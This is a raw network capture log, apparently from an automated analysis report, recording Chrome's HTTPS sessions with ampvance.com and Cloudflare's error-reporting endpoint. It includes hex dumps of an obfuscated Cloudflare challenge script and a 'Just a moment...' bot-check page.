                                                      2024-03-05 13:24:34 UTC1369INData Raw: 6c 28 6d 2c 6e 29 7d 2c 27 75 6e 71 53 59 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 78 45 57 77 44 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 5e 6d 7d 2c 27 61 41 57 73 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 79 67 5a 79 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 68 64 73 51 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3e 3e 3e 6d 7d 2c 27 43 75 70 42 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 73 4f 76 46 41 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d
                                                      Data Ascii: l(m,n)},'unqSY':function(l,m){return l+m},'xEWwD':function(l,m){return l^m},'aAWsn':function(l,m,n){return l(m,n)},'ygZyx':function(l,m,n){return l(m,n)},'hdsQk':function(l,m){return l>>>m},'CupBe':function(l,m){return l-m},'sOvFA':function(l,m){return l-
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 6e 2c 6f 2c 73 2c 76 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 6a 66 3d 6a 62 2c 66 5b 6a 66 28 31 31 38 33 29 5d 28 6a 66 28 31 37 32 39 29 2c 66 5b 6a 66 28 36 36 32 29 5d 29 29 7b 66 6f 72 28 42 3d 6a 66 28 35 30 33 29 5b 6a 66 28 31 31 34 37 29 5d 28 27 7c 27 29 2c 43 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 42 5b 43 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 44 3d 61 4a 5b 35 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 45 3d 61 4c 5b 37 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 46 3d 61 47 5b 32 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 61 44 3d 61 45 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 47 3d 61 46 5b 31 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 48 3d 61 48
                                                      Data Ascii: n,o,s,v,K,L,M,N,O){if(jf=jb,f[jf(1183)](jf(1729),f[jf(662)])){for(B=jf(503)[jf(1147)]('|'),C=0;!![];){switch(B[C++]){case'0':D=aJ[5];continue;case'1':E=aL[7];continue;case'2':F=aG[2];continue;case'3':aD=aE[0];continue;case'4':G=aF[1];continue;case'5':H=aH
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 63 68 2c 4f 2c 31 31 29 2c 63 69 28 4f 2c 32 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 44 3d 4a 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 33 27 3a 63 66 5b 4f 5d 3d 4d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 34 27 3a 4f 3d 66 5b 6a 66 28 31 34 36 35 29 5d 28 63 6a 2c 66 5b 6a 66 28 31 32 30 36 29 5d 28 63 6b 2c 66 5b 6a 66 28 31 35 37 35 29 5d 28 63 6c 2c 63 6d 28 45 2c 4f 29 2c 66 5b 6a 66 28 39 32 35 29 5d 28 4a 26 44 2c 49 26 7e 4a 29 29 2c 63 6e 5b 63 6f 5d 29 2c 63 70 5b 63 71 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 35 27 3a 4f 3d 62 56 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 36 27 3a 4a 3d 63 79 28 48 2c 4f 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 63 6f 6e 74 69 6e 75 65 7d 62 72
                                                      Data Ascii: ch,O,11),ci(O,25));continue;case'12':D=J;continue;case'13':cf[O]=M;continue;case'14':O=f[jf(1465)](cj,f[jf(1206)](ck,f[jf(1575)](cl,cm(E,O),f[jf(925)](J&D,I&~J)),cn[co]),cp[cq]);continue;case'15':O=bV;continue;case'16':J=cy(H,O);continue}break}continue}br
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 29 2c 67 31 5b 69 6f 28 31 30 35 30 29 5d 3d 69 6f 28 32 38 35 29 2c 67 31 5b 69 6f 28 37 35 33 29 5d 3d 69 6f 28 31 33 39 31 29 2c 67 31 5b 69 6f 28 31 34 37 31 29 5d 3d 69 6f 28 36 34 38 29 2c 67 31 5b 69 6f 28 31 39 33 36 29 5d 3d 69 6f 28 31 39 38 33 29 2c 67 31 5b 69 6f 28 35 32 32 29 5d 3d 69 6f 28 31 30 33 37 29 2c 67 31 5b 69 6f 28 31 34 34 29 5d 3d 69 6f 28 39 35 32 29 2c 67 32 3d 7b 7d 2c 67 32 5b 69 6f 28 31 33 39 29 5d 3d 69 6f 28 31 32 35 38 29 2c 67 32 5b 69 6f 28 31 37 30 30 29 5d 3d 69 6f 28 31 38 36 31 29 2c 67 32 5b 69 6f 28 31 37 36 35 29 5d 3d 69 6f 28 31 35 31 30 29 2c 67 32 5b 69 6f 28 31 33 35 34 29 5d 3d 69 6f 28 31 34 33 35 29 2c 67 32 5b 69 6f 28 31 32 32 34 29 5d 3d 69 6f 28 31 32 35 39 29 2c 67 32 5b 69 6f 28 31 30 36 37 29 5d
                                                      Data Ascii: ),g1[io(1050)]=io(285),g1[io(753)]=io(1391),g1[io(1471)]=io(648),g1[io(1936)]=io(1983),g1[io(522)]=io(1037),g1[io(144)]=io(952),g2={},g2[io(139)]=io(1258),g2[io(1700)]=io(1861),g2[io(1765)]=io(1510),g2[io(1354)]=io(1435),g2[io(1224)]=io(1259),g2[io(1067)]
                                                      2024-03-05 13:24:34 UTC1369INData Raw: 3d 69 6f 28 35 35 38 29 2c 67 34 5b 69 6f 28 31 37 36 35 29 5d 3d 69 6f 28 31 30 34 39 29 2c 67 34 5b 69 6f 28 31 33 35 34 29 5d 3d 69 6f 28 39 36 32 29 2c 67 34 5b 69 6f 28 31 32 32 34 29 5d 3d 69 6f 28 32 39 31 29 2c 67 34 5b 69 6f 28 31 30 36 37 29 5d 3d 69 6f 28 37 32 32 29 2c 67 34 5b 69 6f 28 34 31 38 29 5d 3d 69 6f 28 33 30 34 29 2c 67 34 5b 69 6f 28 31 38 37 35 29 5d 3d 69 6f 28 32 31 35 29 2c 67 34 5b 69 6f 28 31 34 39 35 29 5d 3d 69 6f 28 31 30 39 35 29 2c 67 34 5b 69 6f 28 31 38 38 35 29 5d 3d 69 6f 28 31 35 31 29 2c 67 34 5b 69 6f 28 31 33 34 37 29 5d 3d 69 6f 28 35 39 32 29 2c 67 34 5b 69 6f 28 31 35 37 29 5d 3d 69 6f 28 31 30 37 37 29 2c 67 34 5b 69 6f 28 31 36 33 37 29 5d 3d 69 6f 28 31 34 35 37 29 2c 67 34 5b 69 6f 28 31 33 39 37 29 5d 3d
                                                      Data Ascii: =io(558),g4[io(1765)]=io(1049),g4[io(1354)]=io(962),g4[io(1224)]=io(291),g4[io(1067)]=io(722),g4[io(418)]=io(304),g4[io(1875)]=io(215),g4[io(1495)]=io(1095),g4[io(1885)]=io(151),g4[io(1347)]=io(592),g4[io(157)]=io(1077),g4[io(1637)]=io(1457),g4[io(1397)]=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.54971835.190.80.14433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:34 UTC531OUTOPTIONS /report/v3?s=XceLM9%2F15QFyNV8EKMCmsRb2%2Fer2O9VN20vO500Khy7MY5nwL33D40mdULbbpHSMADWU1DQ6DoOuF%2FhlYEvM3ADJceuLowQQrxLvOJVZgbI6%2FuQ38D81pfFJlwIa1tk%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://ampvance.com
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:35 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: POST, OPTIONS
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-length, content-type
                                                      date: Tue, 05 Mar 2024 13:24:34 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.549719104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:35 UTC852OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:24:35 UTC1290INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 05 Mar 2024 13:24:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 16226
                                                      Connection: close
                                                      Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Resource-Policy: same-origin
                                                      Origin-Agent-Cluster: ?1
                                                      Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                      Referrer-Policy: same-origin
                                                      X-Frame-Options: SAMEORIGIN
                                                      cf-mitigated: challenge
                                                      cf-chl-out: DXdJ7kKFaC8HJEymw3sls4TBUy3EKZNobC7ZwcKpomykMPojB3vV/g7A817Vgyhi+EaZc7xBEEmy8kka+9R1DOyo2vf3i7Pvn7ZKEk1ITV3jIy7hV52zV4OM6dnt5MElfmKmlwWCA5JExOVL56f0Bw==$ZCTTS72LO8Bko9DmAR72Dg==
                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                      2024-03-05 13:24:35 UTC401INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 65 79 39 58 56 75 32 75 6d 47 75 66 47 50 62 58 78 39 51 36 45 69 37 68 49 30 34 58 58 67 4a 66 52 79 61 52 56 55 75 42 64 62 4d 57 54 6b 37 7a 78 4c 75 42 37 34 41 48 49 6c 52 70 64 51 6f 68 34 75 50 6e 6b 6c 6f 25 32 46 4e 79 56 61 4f 4b 33 49 35 30 37 42 4d 4f 4d 6a 71 47 73 47 49 55 48 58 52 6f 56 59 53 42 68 25 32 46 50 41 6b 50 4e 50 41 33 7a 48 6c 39 71 4b 38 70 67 6d 6f 71 42 4f 77 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ey9XVu2umGufGPbXx9Q6Ei7hI04XXgJfRyaRVUuBdbMWTk7zxLuB74AHIlRpdQoh4uPnklo%2FNyVaOK3I507BMOMjqGsGIUHXRoVYSBh%2FPAkPNPA3zHl9qK8pgmoqBOw%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                      2024-03-05 13:24:35 UTC1047INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                      Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75
                                                      Data Ascii: mciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAu
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 64 79 2e 64 61 72 6b 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 64 61 72 6b 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62
                                                      Data Ascii: dy.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ib
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 66 63 35 37 34 61 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 62 6f 64 79 2e 6c 69 67 68 74 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 6c 69 67 68 74 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f
                                                      Data Ascii: div{border-color:#595959 transparent transparent}body.light .font-red{color:#fc574a}body.light .big-button,body.light .pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light #challenge-success-text{background-image:url(data:image/
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 7d 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70
                                                      Data Ascii: ecoration:none;transition:color .15s ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72
                                                      Data Ascii: jY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{backgr
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64
                                                      Data Ascii: th:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";display:table}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 37 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 32 22 3e 3c 73 70 61 6e 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e
                                                      Data Ascii: http-equiv="refresh" content="375"></head><body class="no-js"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div id="challenge-error-title"><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to contin
                                                      2024-03-05 13:24:35 UTC1369INData Raw: 53 7a 44 71 7a 76 61 4a 78 50 33 64 63 68 42 5f 65 50 44 54 46 33 33 6f 61 54 5f 36 32 36 49 56 55 39 5a 6a 67 65 4c 4b 6b 47 77 43 54 50 36 4e 5f 43 4f 57 76 2e 41 66 4f 72 32 50 55 59 77 33 5f 56 43 4b 78 46 38 44 34 5f 58 4a 63 35 43 79 51 31 70 6e 64 43 43 35 5f 47 2e 59 44 41 66 39 55 56 76 70 50 78 41 69 73 6e 43 6f 76 4b 65 37 44 68 66 6b 44 45 68 50 44 43 31 79 48 52 50 74 53 5a 36 41 66 6a 4b 46 5f 37 63 38 5a 69 37 57 72 56 63 6a 78 77 42 31 50 4c 4e 31 54 63 34 54 37 74 49 66 35 50 63 48 58 38 73 32 54 78 56 7a 50 72 72 74 4c 71 58 4c 2e 4a 5f 7a 4a 7a 6d 2e 2e 69 66 5a 43 44 64 4b 69 78 34 72 45 52 4d 55 5f 34 6f 53 4e 75 48 61 38 68 36 63 70 6c 39 4e 37 67 6f 74 54 44 41 56 51 4a 70 57 6f 43 38 7a 75 62 59 49 74 48 6a 54 4f 64 50 4c 70 52 50
                                                      Data Ascii: SzDqzvaJxP3dchB_ePDTF33oaT_626IVU9ZjgeLKkGwCTP6N_COWv.AfOr2PUYw3_VCKxF8D4_XJc5CyQ1pndCC5_G.YDAf9UVvpPxAisnCovKe7DhfkDEhPDC1yHRPtSZ6AfjKF_7c8Zi7WrVcjxwB1PLN1Tc4T7tIf5PcHX8s2TxVzPrrtLqXL.J_zJzm..ifZCDdKix4rERMU_4oSNuHa8h6cpl9N7gotTDAVQJpWoC8zubYItHjTOdPLpRP


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.54972035.190.80.14433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:24:35 UTC476OUTPOST /report/v3?s=XceLM9%2F15QFyNV8EKMCmsRb2%2Fer2O9VN20vO500Khy7MY5nwL33D40mdULbbpHSMADWU1DQ6DoOuF%2FhlYEvM3ADJceuLowQQrxLvOJVZgbI6%2FuQ38D81pfFJlwIa1tk%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 427
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
